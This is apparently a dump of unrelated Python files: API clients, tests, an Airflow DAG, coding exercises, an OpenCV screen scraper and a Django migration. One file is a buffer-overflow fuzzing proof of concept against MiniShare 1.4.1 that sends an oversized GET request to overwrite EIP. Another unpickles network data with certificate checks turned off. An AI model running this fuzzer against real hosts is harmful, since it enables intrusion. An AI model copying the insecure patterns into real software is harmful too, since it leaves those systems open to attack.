moduleName = self.txtModule.text()
address = self.txtAddress.text()
patch=self.txtPatch.text()
if len(moduleName) <= 0 or len(address)<=0 or len(patch)<=0:
QMessageBox().information(self, "提示", "类名为空")
return
self.moduleName = moduleName
self.address = address
self.patch = patch
self.accept() |
from future import standard_library
standard_library.install_aliases()
from builtins import object
import operator
import array
import urllib.request, urllib.parse, urllib.error
import urllib.request, urllib.error, urllib.parse
import json
import uservoice
from requests_oauthlib import OAuth1
from urllib.parse import parse_qs
import requests
version='0.0.23'
class APIError(RuntimeError): pass
class Unauthorized(APIError): pass
class NotFound(APIError): pass
class RateLimitExceeded(APIError): pass
class ApplicationError(APIError): pass
class Client(object):
def __init__(self, subdomain_name, api_key, api_secret=None, oauth_token='', oauth_token_secret='', callback=None, protocol=None, uservoice_domain=None):
self.request_token = None
self.token = oauth_token
self.secret = oauth_token_secret
self.default_headers = { 'Content-Type': 'application/json', 'Accept': 'application/json', 'API-Client': 'uservoice-python-' + version }
oauth_hooks = {}
if api_secret:
self.oauth = OAuth1(api_key, api_secret, resource_owner_key=self.token, resource_owner_secret=self.secret, callback_uri=callback)
else:
self.oauth = None
self.api_url = "{protocol}://{subdomain_name}.{uservoice_domain}".format(
subdomain_name=subdomain_name,
protocol=(protocol or 'https'),
uservoice_domain=(uservoice_domain or 'uservoice.com')
)
self.api_key = api_key
self.api_secret = api_secret
self.callback = callback
self.subdomain_name = subdomain_name
self.uservoice_domain = uservoice_domain
self.protocol = protocol
def get_request_token(self, callback=None):
url = self.api_url + '/oauth/request_token'
body = {}
if self.callback or callback:
body['oauth_callback'] = callback or self.callback
oauth = OAuth1(self.api_key, self.api_secret, callback_uri=self.callback)
resp = requests.post(url, body, headers=self.default_headers, auth=oauth)
token = parse_qs(resp.text)
if not 'oauth_token' in token or not 'oauth_token_secret' in token:
raise Unauthorized('Failed to get request token')
return self.login_with_access_token(token['oauth_token'][0], token['oauth_token_secret'][0])
def authorize_url(self):
self.request_token = self.get_request_token()
url = self.api_url + '/oauth/authorize?oauth_token=' + self.request_token.token
return url
def login_with_verifier(self, verifier=None):
url = self.api_url + '/oauth/access_token'
oauth = OAuth1(self.api_key, self.api_secret, resource_owner_key=self.request_token.token, resource_owner_secret=self.request_token.secret, callback_uri=self.callback, verifier=verifier)
resp = requests.post(url, auth=oauth)
token = parse_qs(resp.text)
return self.login_with_access_token(token['oauth_token'][0], token['oauth_token_secret'][0])
def login_with_access_token(self, token, secret):
return Client(self.subdomain_name, self.api_key, self.api_secret, oauth_token=token, oauth_token_secret=secret, callback=self.callback,
protocol=self.protocol,
uservoice_domain=self.uservoice_domain)
def request(self, method, path, params={}):
json_body = None
get_parameters = {}
method = method.upper()
url = self.api_url + path
if self.api_secret == None:
if '?' in url:
url += '&client=' + self.api_key
else:
url += '?client=' + self.api_key
json_resp = None
if method == 'POST':
json_resp = requests.post(url, json.dumps(params), headers=self.default_headers, auth=self.oauth)
elif method == 'PUT':
json_resp = requests.put(url, json.dumps(params), headers=self.default_headers, auth=self.oauth)
elif method == 'GET':
json_resp = requests.get(url, headers=self.default_headers, auth=self.oauth)
elif method == 'DELETE':
json_resp = requests.delete(url, headers=self.default_headers, auth=self.oauth)
attrs = {}
try:
if json_resp.status_code == 404:
attrs = {'errors': {'type': 'record_not_found' }}
elif json_resp.status_code == 429:
attrs = {'errors': {'type': 'rate_limit_exceeded' }}
else:
attrs = json_resp.json()
except json.JSONDecodeError as e:
raise APIError(e)
if 'errors' in attrs:
if attrs['errors']['type'] == 'unauthorized':
raise Unauthorized(attrs)
elif attrs['errors']['type'] == 'record_not_found':
raise NotFound(attrs)
elif attrs['errors']['type'] == 'rate_limit_exceeded':
raise RateLimitExceeded(attrs)
elif attrs['errors']['type'] == 'application_error':
raise ApplicationError(attrs)
else:
raise APIError(attrs)
return attrs
# handy delegate methods
def get(self, path, params={}): return self.request('get', path, params)
def put(self, path, params={}): return self.request('put', path, params)
def post(self, path, params={}): return self.request('post', path, params)
def delete(self, path, params={}): return self.request('delete', path, params)
def get_collection(self, path, **opts):
return uservoice.Collection(self, path, **opts)
def login_as(self, email):
resp = self.post('/api/v1/users/login_as', {
'request_token': self.get_request_token().token,
'user': { 'email': email }
})
if 'token' in resp:
token = resp['token']['oauth_token']
secret = resp['token']['oauth_token_secret']
return self.login_with_access_token(token, secret)
else:
raise Unauthorized(resp)
def login_as_owner(self):
resp = self.post('/api/v1/users/login_as_owner', {
'request_token': self.get_request_token().token
})
if 'token' in resp:
token = resp['token']['oauth_token']
secret = resp['token']['oauth_token_secret']
return self.login_with_access_token(token, secret)
else:
raise Unauthorized(resp)
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
pass
|
# Copyright 2011 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from proboscis import before_class
from proboscis import test
from proboscis.asserts import assert_equal
from proboscis.asserts import assert_raises
from trove import tests
from trove.scheduledtask.models import DBScheduledTaskType
from trove.tests.util import test_config
from trove.tests.util import create_dbaas_client
from trove.tests.util.users import Requirements
from trove.tests.util.check import TypeCheck
from troveclient.compat import exceptions
FAKE_MODE = test_config.values['fake_mode']
GROUP = "dbaas.api.mgmt.scheduledtasktypes"
@test(groups=[tests.DBAAS_API, GROUP])
class ScheduledTaskTypesTest(object):
@before_class
def setUp(self):
self.user = test_config.users.find_user(Requirements(is_admin=True))
self.client = create_dbaas_client(self.user)
self.type = "test"
DBScheduledTaskType.create(type="test", enabled=True,
description="test")
@test
def test_scheduledtasktype_list(self):
types = self.client.scheduledtasktypes.list()
assert(len(types) > 0)
for type in types:
with TypeCheck('ScheduledTaskType', type) as check:
check.has_field("type", basestring)
check.has_field("description", basestring)
check.has_field("enabled", bool)
check.has_field("links", list)
@test()
def test_scheduledtasktype_disable(self):
assert_raises(exceptions.NotFound,
self.client.scheduledtasktypes.disable, 'nonexistent')
type_data = self.client.scheduledtasktypes.disable(self.type)
assert_equal(type_data.enabled, False)
@test(runs_after=[test_scheduledtasktype_disable])
def test_scheduledtasktype_enable(self):
assert_raises(exceptions.NotFound,
self.client.scheduledtasktypes.enable, 'nonexistent')
type_data = self.client.scheduledtasktypes.enable(self.type)
assert_equal(type_data.enabled, True)
|
import ConfigParser
from config.server import ServerConfig
from net.server import TerrariaServer
def load_config():
config = ConfigParser.RawConfigParser()
config.read('server.cfg')
return ServerConfig().from_config(config)
def main():
config = load_config()
server = TerrariaServer(config)
server.run()
if __name__ == '__main__':
main()
|
#coding=utf-8
__author__ = '冬冬'
from CheckOnline.ping import ping
import threading
lock = threading.Lock()
ipAddressDict={}
def scan(ip,timeout = 0.1):
global ipAddressDict
if ping(ip,timeout) != None:
lock.acquire()
ipAddressDict[ip] = 'YES'
lock.release()
else:
lock.acquire()
ipAddressDict[ip] = 'NO'
lock.release()
def netTest(ipAddressList):
global ipAddressDict
threads = []
for ip in ipAddressList:
threads.append(threading.Thread(target = scan,args = (ip,)))
for x in range(len(ipAddressList)):
threads[x].start()
for x in range(len(ipAddressList)):
threads[x].join()
return ipAddressDict
|
# Ano 2018
# exercício realizado durante o curso
# @jadilson12
#escreva um programa para aprovar o emprestimo bancario para comprar uma casa.
casa = float(input("Valor da casa: R$"))
salario = float(input("Salário do comprador : R$"))
anos = int(input("Quantos anos de finaciamento: "))
pestacao = casa / (anos * 12)
minimo = (salario*30) /100
print('Para pagar a casa de {:.2f} em {} anos'.format(casa,anos), end='')
print(' o valor da pestação é R${:.2f}'.format(pestacao))
if minimo >= pestacao:
print("\n{}\n".format('Parabéns! Seu empréstimo foi Aprovado'))
else:
print("\n{}\n ".format('Desculpe seu cretido não foi aprovado'))
|
import cv2
import mss
import imutils
import os
import sys
import time
import datetime
from imutils import contours
import numpy as np
def referenceGrabber(n=0):
return
def grabber(pair_title,n,sct):
top, left = 20, 4
width, height = 72, 119
monitor_number = 2
mon = sct.monitors[monitor_number]
monitor_TS_new = {'top':mon['top']+top, 'left':mon['left']+left+width*n, 'width':width, 'height':height, 'mon': monitor_number,}
monitor_TS_old = {'top':mon['top']+top + height, 'left':mon['left']+left+width*n, 'width':width, 'height':height, 'mon': monitor_number,}
frame_TS_new_raw = np.array(sct.grab(monitor_TS_new))
frame_TS_new = cv2.cvtColor(frame_TS_new_raw, cv2.COLOR_RGBA2RGB)
frame_TS_old_raw = np.array(sct.grab(monitor_TS_old))
frame_TS_old = cv2.cvtColor(frame_TS_old_raw, cv2.COLOR_RGBA2RGB)
# create bounds for color detection
green_lower_range, green_upper_range = np.array([0,15,0]), np.array([10,255,10])
red_lower_range, red_upper_range = np.array([0,0,30]), np.array([85,100,255])
red_lower_range_old, red_upper_range_old = np.array([0,0,120]), np.array([10,10,255])
# color mask each TS region
green_mask_TS_new = cv2.inRange(frame_TS_new,green_lower_range, green_upper_range)
red_mask_TS_new = cv2.inRange(frame_TS_new,red_lower_range, red_upper_range)
green_mask_TS_old = cv2.inRange(frame_TS_old,green_lower_range, green_upper_range)
red_mask_TS_old = cv2.inRange(frame_TS_old,red_lower_range_old, red_upper_range_old)
# find contours for Old TS
cnts_green_old = cv2.findContours(green_mask_TS_old.copy(), cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)
cnts_green_old = cnts_green_old[0] if imutils.is_cv2() else cnts_green_old[1]
cnts_red_old = cv2.findContours(red_mask_TS_old.copy(), cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)
cnts_red_old = cnts_red_old[0] if imutils.is_cv2() else cnts_red_old[1]
# count the number of green/red or zero boxes for Old TS
filename = pair_title+' old.txt'
here = os.path.dirname(os.path.realpath(__file__))
subdir = 'files'
fullpath = os.path.join(here, subdir, filename)
green_bars=0
red_bars=0
if len(cnts_green_old) > 0:
for c in cnts_green_old:
if cv2.contourArea(c) > 100:
green_bars +=1
if green_bars > 0:
try:
with open(fullpath, 'w') as f:
f.write(str(green_bars))
except PermissionError as err:
print("OS error: {0}".format(err))
elif len(cnts_red_old) > 0:
for c in cnts_red_old:
if cv2.contourArea(c) > 100:
red_bars -=1
if red_bars < 0:
try:
with open(fullpath, 'w') as f:
f.write(str(red_bars))
except PermissionError as err:
print("OS error: {0}".format(err))
if green_bars == 0 & red_bars == 0:
if time.time() > os.path.getmtime(fullpath) + 300: # 5 min persist
try:
with open(fullpath, 'w') as f:
f.write('0')
except PermissionError as err:
print("OS error: {0}".format(err))
# find contours for New TS
cnts_green_new = cv2.findContours(green_mask_TS_new.copy(), cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)
cnts_green_new = cnts_green_new[0] if imutils.is_cv2() else cnts_green_new[1]
cnts_red_new = cv2.findContours(red_mask_TS_new.copy(), cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)
cnts_red_new = cnts_red_new[0] if imutils.is_cv2() else cnts_red_new[1]
# save New TS values
filename = pair_title+' new.txt'
here = os.path.dirname(os.path.realpath(__file__))
subdir = 'files'
fullpath = os.path.join(here, subdir, filename)
zero_green, zero_red = True, True
if len(cnts_green_new) > 0:
for c in cnts_green_new:
# if the contour is not sufficiently large, ignore it
if cv2.contourArea(c) > 175:
zero_green = False
area = cv2.contourArea(c)
try:
with open(fullpath, 'w') as f:
f.write(str(area))
except PermissionError as err:
print("OS error: {0}".format(err))
elif len(cnts_red_new) > 0:
for c in cnts_red_new:
# if the contour is not sufficiently large, ignore it
if cv2.contourArea(c) > 175:
zero_red = False
area = cv2.contourArea(c)
try:
with open(fullpath, 'w') as f:
f.write('-'+str(area))
except PermissionError as err:
print("OS error: {0}".format(err))
if zero_green == True and zero_red == True:
try:
with open(fullpath, 'w') as f:
f.write('0')
except PermissionError as err:
print("OS error: {0}".format(err))
#cv2.imshow("Green TS New Raw", green_mask_TS_new)
#cv2.imshow("Green TS Old Raw", green_mask_TS_old)
#cv2.imshow("Red TS New Raw", red_mask_TS_new)
#cv2.imshow("Red TS Old Raw", red_mask_TS_old)
#FX_pairs_list = ['REF':0,'GU':1, 'EU':2,'UJ':3,'UC':4,'CL':5,'DX':6]
def main():
time_now=0
while True:
with mss.mss() as sct:
grabber('GU',1,sct)
grabber('EU',2,sct)
grabber('UJ',3,sct)
grabber('UC',4,sct)
grabber('CL',5,sct)
grabber('DX',6,sct)
#time.sleep(1)
if time.time() > time_now + 10:
t = datetime.datetime.now()
s = t.strftime('%Y.%m.%d %H:%M:%S.%f')
time_now = s[:-4]
print('TS Detect running at ' + time_now + '...')
time_now=time.time()
if __name__ == '__main__':
main()
|
from airflow import models
from airflow.contrib.operators.dataproc_operator import DataprocClusterCreateOperator, DataprocClusterDeleteOperator, DataProcPySparkOperator
from datetime import datetime, timedelta
from operators.http_to_gcs import HttpToGcsOperator
default_args = {
'owner': 'AirFlow',
'start_date': datetime(2020, 2, 14),
'retry_delay': timedelta(minutes=5)
}
GCS_BUCKET = 'seth_sucks'
PYSPARK_JOB = 'gs://' + GCS_BUCKET + '/spark-jobs/compute_aggregates.py'
with models.DAG('ComputeStats', default_args=default_args, schedule_interval="0 0 * * *") as dag:
create_cluster = DataprocClusterCreateOperator(
task_id='CreateCluster',
cluster_name="analyse-pricing-{{ ds }}",
project_id="afspfeb3-9d4bdb09f618016d0bc39",
num_workers=2,
zone="europe-west4-a",
dag=dag,
)
compute_aggregates = DataProcPySparkOperator(
task_id="compute_aggregates",
main=PYSPARK_JOB,
cluster_name="analyse-pricing-{{ ds }}",
dag=dag,
)
delete_cluster = DataprocClusterDeleteOperator(
task_id='DeleteCluster',
cluster_name="analyse-pricing-{{ ds }}",
project_id="afspfeb3-9d4bdb09f618016d0bc39",
dag=dag,
)
create_cluster >> compute_aggregates >> delete_cluster
|
#coding=utf-8
import time,json,hashlib,os,rsa
import sys,re,base64,requests
from config import config
class rsaEncryption:
def __init__(self):
pass
#方法名称:RSA公钥加密函数
def PublicRSA(self,PartJsonParameter):
publicKey =b"""-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCiwJbb2EeK9ZB4Chyj5/mIVPRE
od0pJrv3LM2UVtkod+2mPVjV9Xi1E06gUaoexX/ebfRXm1eBwu3LtYbklh5Ji5oF
ycoUCFhwzhmm8ZtjdkCIicFfxUU4I5NunL6+37+hy43EgCrao5tFgHtnkeR/vNyG
faxdxevPbVEtWlJz6wIDAQAB
-----END PUBLIC KEY-----"""
key=rsa.PublicKey.load_pkcs1_openssl_pem(publicKey)
MiddleCipher=rsa.encrypt(str.encode(PartJsonParameter),key)
SecretText=base64.encodestring(MiddleCipher)
#return (bytes.decode(SecretText)).replace("\n","")
return SecretText
#方法名称:调用RSA加密做分段加密函数
def SliceEncryption(self,JsonPara):
#切割入参字符串
PartSecretTextList=re.split(r'(.{117})',JsonPara)
SecretParameter=''
for PartSecretText in PartSecretTextList:
#去除为空的非法元素
if PartSecretText=='':
PartSecretTextList.remove(PartSecretText)
#对非空的列表元素进行加密拼接
else:
key=bytes.decode(self.PublicRSA(PartSecretText))
#SecretParameter=(SecretParameter+key)[:-1]
SecretParameter=SecretParameter+key
#返回密文
return SecretParameter
class authentication:
def __init__(self):
self.authsessionParaPath=config.autoFrameworkPathSetDic["authsessionParaPath"]
#方法名称:MD5加密函数
def md5(self,SignStr):
SignStrResult=isinstance(SignStr,str)
if SignStrResult==True:
m=hashlib.md5()
m.update(SignStr.encode('utf-8'))
return m.hexdigest()
else:
return False
#方法名称:字典键值对排序并转字符串函数
def SortDicAndTurnToStr(self,DicSignPara):
ListBeforeMD5=sorted(DicSignPara.items(),key=lambda asd:asd[0],reverse=False)
StrSignPara=''
for i in range(len(ListBeforeMD5)):
for j in range(2):
StrSignPara=StrSignPara+str(ListBeforeMD5[i][j])
return StrSignPara
#方法名称:业务参数转Json字符串函数
def ParamsJsonCreate(self,Parameter,ParaType):
if ParaType=='Y':
JsonParameter=json.dumps(Parameter).replace(' ','')
else:
JsonParameter=json.dumps(Parameter)
return JsonParameter
#方法名称:Post请求的参数字典创建函数
def CreateEntryDic(self,BusinessParameters,AuthSession,result=0):
#最终业务参数处理
if len(BusinessParameters)>0:
#定义原始业务参数,业务参数序列化成json字符串
ParaType='Y'
JsonBusinessParameter=self.ParamsJsonCreate(BusinessParameters,ParaType)
#做RSA加密传给para
if result==0:
rsaPara=rsaEncryption()
para=rsaPara.SliceEncryption(JsonBusinessParameter).replace('\n', '')
else:
para=JsonBusinessParameter
else:
ParaType='N'
para=self.ParamsJsonCreate(BusinessParameters,ParaType)
#定义创建sign参数的入参字典
CreateSignPara={
"timestamp":int(time.time()),
"app_id":config.InterfacePubPara['app_id'],
"version":config.InterfacePubPara['version'],
"session":config.InterfacePubPara['session'],
"auth_session":AuthSession,
"params":para
}
#序列化成json字符串
JsonSignPara=self.SortDicAndTurnToStr(CreateSignPara)
#获取Secret参数
secret=config.InterfacePubPara['secret']
#将入参字典的Json字符串和secret拼接后做MD5加密获取sign参数
if result==0:
sign=self.md5(JsonSignPara+secret)
else:
sign=self.md5("2ea342511cb908728db3998d71f4161f"+JsonSignPara+secret)
#定义接口入参字典
DicInterfaceTestPara=CreateSignPara
DicInterfaceTestPara['sign']=sign
return DicInterfaceTestPara
#调用登录接口将用户登录上去并获取AuthSession,记录到指定文件中,留备使用
def authSessionCreate(self):
loginApiPara={}
loginApiPara['name']=base64.encodestring(('miababy'+config.LoginUsername).encode()).decode()[:-1]
loginApiPara['password']=base64.encodestring(('miababy'+config.LoginPassword).encode()).decode()[:-1]
AuthSession="5ca6242f7db1b275783d95a4892727e8"
interfacePara=self.CreateEntryDic(loginApiPara,AuthSession)
#url=config.BaseURL[0]+'/account/PressureTestLogin/'
url=config.BaseURL[0]+'/account/Login/'
result=(requests.post(url,interfacePara)).text
result=json.loads(result,encoding='utf-8')
AuthSession=result['content']['auth_session']
AuthSessionPara=open(self.authsessionParaPath,'w')
AuthSessionPara.write(AuthSession)
AuthSessionPara.close()
#调用指定接口并获取指定参数,返回给主调功能
def cycleRequest(self,requestMethod,requestURL,requestParas,paraWant,judgeValue,stopNum):
for i in range(int(stopNum)):
cmd="requests."+requestMethod+"("+'"'+requestURL+'"'+","+"requestParas"+")"
requestResult=eval(cmd)
requestResult=json.loads(requestResult.text,encoding='utf-8')
catch=requestResult['content'][paraWant]
time.sleep(1)
print(catch)
if catch==judgeValue or catch==int(judgeValue):
return "True"
elif i==int(stopNum)-1:
return "False"
else:
pass
def cleanCart(self):
url=config.BaseURL[0]+'/cart/info/'
AuthSession=open(self.authsessionParaPath).read()
interfacePara=self.CreateEntryDic({},AuthSession)
result=requests.post(url,interfacePara)
result=json.loads(result.text,encoding='utf-8')
catch=result["content"]["row_infos"]
rowidList=[]
for itemGroup in catch:
for items in (itemGroup["item_group"]):
for item in items["items"]:
rowid=item["id"]
rowidList.append(rowid)
for rowid in rowidList:
para={"row_id":rowid}
interfacePara2=self.CreateEntryDic(para,AuthSession)
url2=config.BaseURL[0]+'/cart/delete/'
result=requests.post(url2,interfacePara2)
result=json.loads(result.text,encoding='utf-8')
#return rowidList
if __name__=="__main__":
aa=authentication()
paras=aa.authSessionCreate()
print(paras)
|
##########
#Question#
##########
'''
URL: https://leetcode.com/problems/search-insert-position/
Given a sorted array of distinct integers and a target value, return the index if the target is found. If not, return the index where it would be if it were inserted in order.
Example 1:
Input: nums = [1,3,5,6], target = 5
Output: 2
Example 2:
Input: nums = [1,3,5,6], target = 2
Output: 1
Example 3:
Input: nums = [1,3,5,6], target = 7
Output: 4
Example 4:
Input: nums = [1,3,5,6], target = 0
Output: 0
Example 5:
Input: nums = [1], target = 0
Output: 0
Constraints:
1 <= nums.length <= 104
-104 <= nums[i] <= 104
nums contains distinct values sorted in ascending order.
-104 <= target <= 104
'''
##########
#Solution#
##########
class Solution:
def searchInsert(self, nums: List[int], target: int) -> int:
# if nums[-1] < target:
# return len(nums)
# try:
# return nums.index(target)
# except ValueError:
# for i in range(0,len(nums)):
# if nums[i] > target:
# break
# return i
if(target in nums):
return nums.index(target)
else:
nums.append(target)
nums.sort()
ind = nums.index(target)
return ind
|
#!/usr/bin/python3.8
# This is a Proof of concept about BufferOverflow vulnerability in MiniShare 1.4.1
# Part 2 of proof of concept by Vry4n
# This script is intended send all the buffer size in one packet, we need to see if EIP value gets overwritten 41414141 (AAAA)
import socket
FUZZ = "A" * 1800
print("Fuzzing with {} bytes".format(len(FUZZ)))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect(("192.168.0.5", 80))
# from a web proxy capturing the HTTP GET Request, we got this line "GET / HTTP/1.1" This is the vulnerable section
s.send(b"GET " + FUZZ.encode() + b"HTTP/1.1\r\n\r\n")
s.recv(1024)
s.close()
|
import logging
import asyncio
import pickle
import ssl
from message_types import measurement_msg
_logger = logging.getLogger(__name__)
def create_ssl_context(ssl_dict):
"""
loads the ssl certificate for secure communication
:param ssl_dict: dictionary consisting of certification file, key
keys: certFile, keyFile
:returns ssl.SSLContext
"""
_logger.debug("#debug:loading-ssl-certificates")
try:
# choosing the version of the SSL Protocol
ssl_context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ssl_context.options |= ssl.OP_NO_SSLv2
ssl_context.options |= ssl.OP_NO_SSLv3
ssl_context.load_cert_chain(certfile=ssl_dict["certFile"], keyfile=ssl_dict["keyFile"])
ssl_context.verify_mode = ssl.CERT_NONE
ssl_context.check_hostname = False
_logger.info("#info:ssl-certificates-loaded!")
return ssl_context
except ssl.SSLError as e:
_logger.exception(e)
_logger.error("#error:could-not-load-the-ssl-certificates")
raise e
class CommunicationModule():
"""
This class is responsible for handling communications with Server
_to_be_acknowledged: is a dictionary, where keys are message_id and values
are the message itself, which is a list of dictionaries, each dictionary represents
a measurement
_to_be_sent: which is a list of dictionaries, each dictionary represents
a measurement
"""
def __init__(self, server_host, server_port, ssl_context):
self._server_host = server_host
self._server_port = server_port
self._ssl_context = ssl_context
self._reader = None
self._writer = None
# dictionary of Messages which
# have not been acknowledged
self._to_be_acknowledged = {}
# the length of each message, number of
# measurements to be send together
self._WINDOW_SIZE = 3
# the message that will be sent to the server
# a list of measurements, size : _WINDOW_SIZE
# each time this list is reach to its limit, a
# message will be sent and list will be emptied
self._to_be_sent = []
# giving ids to the messages
self._MSG_COUNTER = 0
@asyncio.coroutine
def connect(self):
# get a connection
try:
self._reader, self._writer = yield from \
asyncio.open_connection(
self._server_host, self._server_port,
ssl=self._ssl_context)
except Exception as e:
_logger.exception(e)
# the exception will be handled on
# the next level (report method of
# the reporter class)
raise e
@asyncio.coroutine
def send(self, msg):
"""
called by Reporter
sends the measurement alongside the previously buffered messages if the limit (_WINDOW_SIZE)
has been reached(by calling send_message), otherwise appends it to the buffered list (to_be_sent)
:param msg: an instance of an object representing a measurement
"""
try:
msg = msg.__dict__
self._to_be_sent.append(msg)
# check if the _message can be send
if len(self._to_be_sent) >= self._WINDOW_SIZE:
# getting the first _WinDOW_SIZE items
message = self._to_be_sent[0:self._WINDOW_SIZE]
# creating the message, giving a new id
# to the message, and send it to the server
self._MSG_COUNTER += 1
yield from self.send_measurement(self._MSG_COUNTER, message)
response = yield from self.receive_message(self._MSG_COUNTER)
# adding the message to the to_be_acknowledged dictionary
self._to_be_acknowledged[self._MSG_COUNTER] = message
# removing message from _to_be_sent list
self._to_be_sent = self._to_be_sent[self._WINDOW_SIZE:]
if response:
yield from self.handle_response(response)
else:
_logger.warn("#warn:no-ack-received-from-server-for-msg-%s" % self._MSG_COUNTER)
else:
_logger.debug("#debug:msg-will-be-send-later-len(to_be_sent):%s" % len(self._to_be_sent))
except Exception as e:
_logger.error("#error:error-occurred-while-sending-the-message:%s" % msg)
_logger.exception(e)
# to be handled by the upper class Reporter
raise e
@asyncio.coroutine
def send_measurement(self, msg_id, msg):
"""
sends a list of measurements
:param msg_id: int
:param msg: list of dictionaries
:return:
"""
message = measurement_msg.MeasurementMessage(id=msg_id, data=msg)
if msg:
# when we are sending a measurement and msg is not None
_logger.debug('#debug:sending-message-with-id-:%s-and-size:%s' % (msg_id, len(msg)))
yield from self.send_message(message)
@asyncio.coroutine
def receive_message(self, msg_id):
"""
waits to receive response by the other side
:param msg_id: int , the msg we are waiting for its response
:return: (bytes) response sent by server
"""
try:
data = yield from asyncio.wait_for(self._reader.read(1000), timeout=3)
return data
except asyncio.TimeoutError:
_logger.warn("#warn:timeout-reached-while-waiting-for-ack-msg:%s" % msg_id)
@asyncio.coroutine
def send_message(self, message):
"""
Sends a message to the server
:param msg_id: (int) id of the message
:param message: an inherited instance of GeneralMessage
(@see general_message.GeneralMessage)
"""
# packing the message into bytes
byte_message = pickle.dumps(message)
# sending the message to the server
self._writer.write(byte_message)
yield from self._writer.drain()
@asyncio.coroutine
def handle_response(self, message):
"""
handles a message sent by the server
:param message: (bytes)
:return:
"""
try:
message = pickle.loads(message)
# message must be a subclass of GeneralMessage
_logger.debug("received-msg-of-type-%s: " % message.get_type())
if message.get_type() == 'ack':
yield from self.handle_ack(message)
elif message.get_type() == 'request':
yield from self.handle_request(message)
else:
_logger.warn("#warn:unknown-message-type-received:%s" % message.get_type())
except pickle.PickleError:
_logger.error("#error:Pickling-error-while-analyzing-message:%s" % message)
except KeyError:
_logger.warn("#debug:-corrupted-message-received-%s" % message)
except AttributeError:
_logger.error("#error:message-is-corrupted-%s" % message)
@asyncio.coroutine
def handle_ack(self, ack):
"""
analyzes the acknowledgment sent by the server
:param ack: an instance of type AckknowledgmentMessage
:return:
"""
try:
_logger.debug("#debug:ack:%s" % ack)
# checking and removing the delivered message from
# our waiting list
if ack.get_success() in self._to_be_acknowledged:
self._to_be_acknowledged.pop(ack.get_success())
else:
_logger.warn("#debug:acknowledgment-received-for-non-existing-message-id:%s" % ack.get_success())
_logger.debug("#debug:to_be_acknowledged-list:%s" % self._to_be_acknowledged)
# if the server asked for a specific
# msg id send the wanted message
if ack.get_wanted():
# send the msg if we have it in buffer
if ack.get_wanted() in self._to_be_acknowledged:
# sending the message to the server
_logger.debug("#debug:sending-wanted-message-id: %s" % ack.get_wanted())
yield from self.send_measurement(ack.get_wanted(), self._to_be_acknowledged[ack.get_wanted()])
response = yield from self.receive_message(ack.get_wanted)
yield from self.handle_response(response)
# the msg asked by server does not exists
# in buffer
else:
_logger.warn("#debug:acknowledgment-received-for-non-existing-message-id:%s" % ack.get_wanted())
_logger.debug("#debug:to_be_acknowledged-list:%s" % self._to_be_acknowledged)
# sending None for this message_id
# server will stop requesting for this id
yield from self.send_measurement(ack.get_wanted(), None)
except pickle.PickleError:
_logger.error("#error:Pickleing-error-while-analyzing-ack:%s" % ack)
except KeyError:
_logger.warn("#debug:-corrupted-ack-received-%s" % ack)
@asyncio.coroutine
def handle_request(self, msg):
"""
handles a request for getting message counter of the client by
the server, sends the server the news value for the _MSG_COUNTER
:param msg: an instance of type requests.Request message type
:return:
"""
if msg.get_request() == 'GET_MSG_COUNTER':
msg.set_response(self._MSG_COUNTER)
yield from self.send_message(msg)
def disconnect(self):
_logger.info("#info:disconnecting-the-communication-module...")
self._writer.close()
|
from pythonforandroid.recipes.setuptools import SetuptoolsRecipe
assert SetuptoolsRecipe._version == "51.3.3"
assert SetuptoolsRecipe.depends == ['python3']
assert SetuptoolsRecipe.python_depends == []
class SetuptoolsRecipePinned(SetuptoolsRecipe):
sha512sum = "5a3572466a68c6f650111448ce3343f64c62044650bb8635edbff97e2bc7b216b8bbe3b4e3bccf34e6887f3bedc911b27ca5f9a515201cae49cf44fbacf03345"
recipe = SetuptoolsRecipePinned()
|
# Generated by Django 3.1.5 on 2021-02-03 11:10
from django.db import migrations, models
import django.db.models.expressions
class Migration(migrations.Migration):
dependencies = [
('api', '0003_auto_20210203_1106'),
]
operations = [
migrations.RemoveConstraint(
model_name='follow',
name='no_follow_yourself',
),
migrations.AddConstraint(
model_name='follow',
constraint=models.CheckConstraint(check=models.Q(_negated=True, user=django.db.models.expressions.F('following')), name='no_follow_yourself'),
),
]
|
# Definition for singly-linked list.
class ListNode(object):
def __init__(self, x):
self.val = x
self.next = None
def printL(head):
while(head!=None):
print head.val,
head = head.next
print ''
class Solution(object):
def confire(self, head, k):
if (head == None):
return False
while (k > 0):
if (head== None):
return False
head = head.next
k = k - 1
return True
def reverseKGroup(self, head, k):
"""
:type head: ListNode
:type k: int
:rtype: ListNode
"""
start = ListNode(0)
start.next = head
node = head
em = None
if (head == None):
return None
elif (head.next == None):
return head
else:
if(self.confire(node,k)):
st, em, node = self.reverse(node, k)
start.next = st
while(self.confire(node,k)):
s,e,node = self.reverse(node,k)
em.next = s
em = e
if(em!=None):
em.next = node
return start.next
def reverse(self,head,k):
start = ListNode(0)
start.next = head
while(head.next!=None and k-1>0 ):
temp = head.next
head.next = temp.next
temp.next = start.next
start.next = temp
k-=1
l = head.next
return start.next,head,l
if __name__ == '__main__':
head = ListNode(1)
head.next = ListNode(2)
head.next.next = ListNode(3)
head.next.next.next = ListNode(4)
head.next.next.next.next = ListNode(5)
head.next.next.next.next.next = ListNode(6)
head.next.next.next.next.next.next = ListNode(7)
s = Solution()
printL(s.reverseKGroup(head,7))
# printL(s.reverse(head,2))
|
import datetime as dt
import numpy as np
import sqlalchemy
from sqlalchemy.ext.automap import automap_base
from sqlalchemy.orm import Session
from sqlalchemy import create_engine, func
from flask import Flask, jsonify
#################################################
# Database Setup
#################################################
engine = create_engine("sqlite:///hawaii.sqlite", connect_args={'check_same_thread': False}, echo=True)
